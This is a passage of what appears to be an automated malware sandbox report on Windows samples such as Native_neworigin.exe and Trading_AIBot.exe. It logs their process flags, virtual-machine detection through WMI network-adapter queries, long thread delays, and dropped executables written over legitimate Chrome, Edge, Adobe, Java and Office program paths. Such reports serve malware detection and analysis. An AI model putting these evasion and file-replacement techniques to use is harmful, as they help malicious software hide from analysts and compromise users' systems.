                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2AD0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 3000000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2E00000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 600000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2350000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 4350000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 5990000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2D990000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2BB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2D40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 4D40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: CF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2810000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 4810000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1200000
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1199861
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1199737
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1199475
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198803
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198580
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198358
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198228
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198114
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197990
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197862
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197676
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197542
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197409
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWindow / User API: threadDelayed 3758
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWindow / User API: threadDelayed 435
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4202
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeDropped PE file which has not been started: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeDropped PE file which has not been started: C:\Windows\System32\FXSSVC.exeJump to dropped file
